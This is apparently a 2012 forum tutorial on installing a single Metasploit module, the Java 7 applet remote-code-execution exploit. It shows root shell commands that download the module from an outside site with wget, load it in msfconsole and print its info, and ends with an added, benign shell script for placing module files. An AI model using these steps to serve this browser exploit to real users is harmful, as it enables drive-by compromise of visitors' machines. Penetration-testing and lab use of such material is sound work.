Using a single Metasploit module file
Posted on 2012-9-12 00:18:30
For example: Java 7 Applet Remote Code Execution (Msf)
  root@Dis9Team:/# cd /root/.msf4/modules/
  root@Dis9Team:~/.msf4/modules# mkdir exploits
  root@Dis9Team:~/.msf4/modules# cd exploits/
  root@Dis9Team:~/.msf4/modules/exploits# mkdir windows/
  root@Dis9Team:~/.msf4/modules/exploits# cd windows/
  root@Dis9Team:~/.msf4/modules/exploits/windows# mkdir browser
  root@Dis9Team:~/.msf4/modules/exploits/windows# cd browser/
  root@Dis9Team:~/.msf4/modules/exploits/windows/browser# wget http://fuzzexp.org/exp/download.php?id=151 -O java_exec.rb
Start MSF and load the module
  root@Dis9Team:~/.msf4/modules/exploits/windows/browser# msfconsole
  msf > use exploit/windows/browser/java_exec
  msf  exploit(java_exec) > info

         Name: Java 7 Applet Remote Code Execution
       Module: exploit/windows/browser/java_exec
      Version: 0
     Platform: Java, Windows, Linux
   Privileged: No
      License: Metasploit Framework License (BSD)
         Rank: Excellent

  Provided by:
    Unknown
    jduck <jduck@metasploit.com>
    sinn3r <sinn3r@metasploit.com>
    juan vazquez <juan.vazquez@metasploit.com>

  Available targets:
    Id  Name
    --  ----
    0   Generic (Java Payload)
    1   Windows Universal
    2   Linux x86

  Basic options:
    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    SRVHOST     5.5.5.4          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT     8080             yes       The local port to listen on.
    SSL         false            no        Negotiate SSL for incoming connections
    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH                      no        The URI to use for this exploit (default is random)

  Payload information:
    Space: 20480
    Avoid: 0 characters

  Description:
    This module exploits a vulnerability in Java 7, which allows an
    attacker to run arbitrary Java code outside the sandbox. This flaw
    is also being exploited in the wild, and there is no patch from
    Oracle at this point. The exploit has been tested to work against:
    IE, Chrome and Firefox across different platforms.

  References:
    http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
    http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html

  msf  exploit(java_exec) >
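
The placement done by the mkdir/cd steps above, as one function. This is an added example, not part of the original post: it maps a module reference name such as exploit/windows/browser/java_exec to its file under ~/.msf4/modules (the type is singular in msfconsole, the directory is plural), rejects names that would land outside the module root, and copies a file that has already been downloaded and reviewed. The function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original post). Function names are hypothetical.

# Print the on-disk path for a module reference name under a module root.
# exploit/windows/browser/java_exec -> ROOT/exploits/windows/browser/java_exec.rb
msf_module_path() {
    root=$1
    ref=$2
    case $ref in
        /*|*..*|*//*|*/|'') return 1 ;;   # absolute path, traversal, empty parts
    esac
    case $ref in
        */*) ;;                            # needs at least type/name
        *) return 1 ;;
    esac
    mtype=${ref%%/*}
    rest=${ref#*/}
    # msfconsole uses singular type names; several directories are plural.
    case $mtype in
        exploit)        dir=exploits ;;
        payload)        dir=payloads ;;
        encoder)        dir=encoders ;;
        nop)            dir=nops ;;
        auxiliary|post) dir=$mtype ;;
        *) return 1 ;;
    esac
    printf '%s/%s/%s.rb\n' "$root" "$dir" "$rest"
}

# Copy a local, already reviewed file into place and print the destination.
# The third argument (module root) defaults to the per-user tree used above.
install_msf_module() {
    src=$1
    ref=$2
    root=${3:-$HOME/.msf4/modules}
    [ -f "$src" ] || { echo "no such file: $src" >&2; return 1; }
    dest=$(msf_module_path "$root" "$ref") || {
        echo "bad module name: $ref" >&2
        return 1
    }
    mkdir -p "$(dirname "$dest")" || return 1
    cp "$src" "$dest" && chmod 600 "$dest" || return 1
    printf '%s\n' "$dest"
}
```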